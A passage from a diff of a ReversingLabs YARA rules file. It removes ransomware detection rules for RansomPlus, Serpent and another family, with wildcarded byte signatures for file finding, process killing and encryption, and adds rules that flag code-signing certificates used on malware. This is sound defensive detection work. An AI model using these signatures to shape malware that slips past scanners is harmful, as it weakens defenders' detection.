-            8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ??
-            ?? ?? C3 90 0F 1F 40 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ??
-            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90
-            E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ??
-            ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ??
-            ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84
-            24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            C3 90 66 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ??
-            ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4
-            ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48
-            8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
-            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 66 90
-            E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ??
-            ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 7C 24
-            ?? E8
-        }
-		$find_files_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
-            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ??
-            ?? 48 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 7E ?? 48 89 5C 24 ?? 31 C9 EB ??
-            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 8D 43 ??
-            48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 58 ?? 48 89 5C
-            24 ?? 48 8B 72 ?? 48 89 D8 FF D6 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48
-            8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 C0 49 89 D9 31 C0 48
-            8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 4C 24 ?? 48
-            8B 51 ?? 48 8B 44 24 ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D
-            4B ?? 66 90 E9 ?? ?? ?? ?? 48 29 CB 48 89 DA 48 F7 DB 48 C1 FB ?? 48 21 D9 48 01 C1
-            48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? EB ?? 31 D2 31 C9 48 89 C8 48 89 D3
-            E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
-            48 8B 3D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 66 90 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D BC
-            24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C
-        }
-		$find_files_p2 = {
-            24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 8D 84 24 ?? ?? ?? ?? 31 C9 0F 1F 00 E9 ?? ?? ??
-            ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 84 C0 74 ?? 48 8B 44 24 ?? 48 8B
-            5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 54 24
-            ?? 0F 1F 00 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF C9 48 85 C9 0F 8C ?? ??
-            ?? ?? 0F B6 14 08 66 90 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA
-            ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 42 ?? 48 89 4C 24 ?? 48 89 84
-            24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 70 ?? 48 89 74 24 ?? 48 8B 5C 24 ?? 48
-            8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 44
-            24 ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ??
-            48 89 DF 48 89 D3 48 89 C2 48 89 C8 48 89 D1 E8 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
-            48 85 C0 0F 8D ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ?? ?? ?? ?? 48
-            8B 4C 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 84
-            24 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ??
-            48 89 5C 24 ?? 48 89 4C 24 ?? 66 90 E8
-        }
-		$kill_procs_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
-            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48
-            89 5C 24 ?? 31 C9 66 90 EB ?? 48 8B 54 24 ?? 48 8D 4A ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ?? ?? 48 89 4C 24 ?? 48 C1
-            E1 ?? 48 8B 1C 08 48 89 5C 24 ?? 48 8B 4C 08 ?? 48 89 4C 24 ?? 48 8B 73 ?? 48 89 C8
-            FF D6 48 89 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48
-            8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 48
-            89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B
-            3D ?? ?? ?? ?? 48 89 C3 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48
-            89 08 48 8D BC 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 48 A5 48 8D BC
-            24 ?? ?? ?? ?? 48 8D 7F ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ??
-            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            EB ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8D 84 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 48 85 C9 0F 84 ?? ?? ??
-            ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 12 48 89 54 24 ?? 48 8B 01 48 89 44 24 ?? 48 8B 59
-            ?? 48 89 5C 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 31 F6 EB ?? 48 8B 94 24 ?? ?? ?? ?? 48 83
-        }
-		$kill_procs_p2 = {
-            C2 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 89 CE 48 89 D1 48 89 74 24 ?? 48 89 8C 24 ??
-            ?? ?? ?? 48 8B 11 48 89 54 24 ?? 48 8B 79 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C
-            24 ?? 48 8B 7C 24 ?? 90 E8 ?? ?? ?? ?? 48 85 C0 0F 8C ?? ?? ?? ?? 48 8B 44 24 ?? BB
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F
-            11 3A 48 8D 15 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ??
-            ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 44 0F 11 BC 24 ?? ?? ?? ??
-            48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ??
-            ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8B 44 24 ?? 90 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $kill_procs_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "pioneersoft" and pe.signatures [ i ] . serial == "08:aa:a0:69:e9:25:17:f2:1c:e6:7c:a7:13:f6:ea:63" and 1368403200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ransomplus : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RansomPlus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ee96eab6-104d-560f-adae-6d5f0ba5d469"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "376da749-3cd4-5e37-b1ee-013e839f98ce"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.RansomPlus.yara#L1-L95"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14876-L14892"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8ab18c6bcb939eac0e74f015dea773141b5086c5fcb4783666eeac1f395bc208"
+		logic_hash = "5febbce8c39440bfc4846f509f0b1dd4f71a8b4dc24fa18afb561d26e53c2446"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RansomPlus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_1_0 = {
-            55 8B EC 83 E4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 EC ??
-            8B CC 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 01 ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ??
-            ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ??
-            ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ??
-            68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$find_files_1_1 = {
-            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8D 8D ?? ?? ?? ?? 51 50 FF 15 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 95 ?? ?? ?? ??
-            41 81 F9 ?? ?? ?? ?? 72 ?? F6 C2 ?? 74 ?? E8 ?? ?? ?? ?? 8B 42 ?? 3B C2 72 ?? E8 ??
-            ?? ?? ?? 2B D0 83 FA ?? 73 ?? E8 ?? ?? ?? ?? 83 FA ?? 76 ?? E8 ?? ?? ?? ?? 8B D0 52
-            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? 83 FB ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 32 DB E9 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? C6 45 ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85
-        }
-		$find_files_1_2 = {
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB
-            ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 55 ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ??
-            8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1
-            6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D
-            ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 FE ?? 0F 43 C2 0F 43 CA 89 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 03 C1 83 FE ?? 8B F8 0F 43 DA 33 C9 2B FB 33 F6 3B D8 0F 47 F9 85
-            FF 74 ?? 0F BE 04 33 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 88 04 31 46 3B F7
-            75 ?? 33 C0 89 85 ?? ?? ?? ?? 8B 94 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D
-            71 ?? 8A 01 41 84 C0 75 ?? 2B CE 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 F9 ?? 0F
-            43 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 C2 03 85 ?? ?? ?? ?? 83 F9 ?? 8B F8
-            0F 43 DA 33 F6 2B FB 3B D8 0F 47 FE 85 FF 74
-        }
-		$encrypt_files = {
-            8A 01 41 84 C0 75 ?? 2B CA C6 85 ?? ?? ?? ?? ?? 33 C0 88 84 05 ?? ?? ?? ?? 40 3D ??
-            ?? ?? ?? 72 ?? 33 F6 8B C6 33 D2 F7 F1 8A 04 3A 02 C1 30 84 35 ?? ?? ?? ?? 46 81 FE
-            ?? ?? ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 55 ?? 8B F8 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            D8 85 FF 74 ?? 85 DB 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B F0 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 56 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ??
-            83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8
-            ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B
-            41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ??
-            E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D
-            ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ??
-            2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8
-            ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B
-            C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ??
-            ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files_1_0 and $find_files_1_1 and $find_files_1_2 and $encrypt_files
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "1b:7b:54:e0:dd:4d:7e:45:a0:b4:68:34:de:52:65:8d" and 1476662400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Serpent : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Serpent ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0757ad7c-b2b1-5323-960a-55ffe3eaed12"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "44af31cc-e0c9-5f3f-9645-a0453bc81e62"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Serpent.yara#L1-L122"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14894-L14912"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5e1917e8d23a5edc65ac423f3d18cc78c3848bd6c1ccc67d052eb37172857081"
+		logic_hash = "da7415d0bc0245dea6a4ec325da5140c79c723c20fb7c04ff14f59a3089a5c88"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Serpent"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$do_dll_stuff_and_create_thread = {
-            68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 89 D2 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 89 FF 90 90 6A ?? 53 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BA
-            ?? ?? ?? ?? 66 0F 6E D2 89 FF 89 C9 31 D2 66 0F 7E D2 89 15 ?? ?? ?? ?? 81 3D ?? ??
-            ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 89 C9 4B
-            75 ?? 89 C9 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B
-            75 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 4B
-            75 ?? 89 FF 90 BB ?? ?? ?? ?? 89 C9 4B 75 ?? 90 90 BB ?? ?? ?? ?? 4B 75 ?? BB ?? ??
-            ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 4B 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 90 BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 90 89 C9 BB ?? ?? ?? ?? 89 FF 4B 75 ?? 68 ?? ?? ?? ??
-            6A ?? 56 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33
-            C0 A3 ?? ?? ?? ?? 64 8B 35 ?? ?? ?? ?? 89 35 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ??
-            90 89 F6 90 BB ?? ?? ?? ?? 89 DB 4B 75 ?? 89 D2 89 C0 BB ?? ?? ?? ?? 89 D2 4B 75 ??
-            C7 05 ?? ?? ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 89 FF 4B 75 ?? 89 C0 0F 31 90 89 C7 0F
-            31 90 89 C0 29 F8 89 D2 89 DB 77 ?? 90 90 89 C9 89 F6 8B 3D ?? ?? ?? ?? 90 90 89 C9
-            89 F6 90 03 3D ?? ?? ?? ?? 90 90 89 C9 89 F6 FF D7 89 F6 90 90 BB ?? ?? ?? ?? 4B 75
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? C3
-        }
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45
-            ?? 8B 58 ?? 83 7B ?? ?? 75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 55 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 73 ?? 6A ?? 8D 45 ?? 50 8B 43 ?? 50 E8 ?? ?? ?? ??
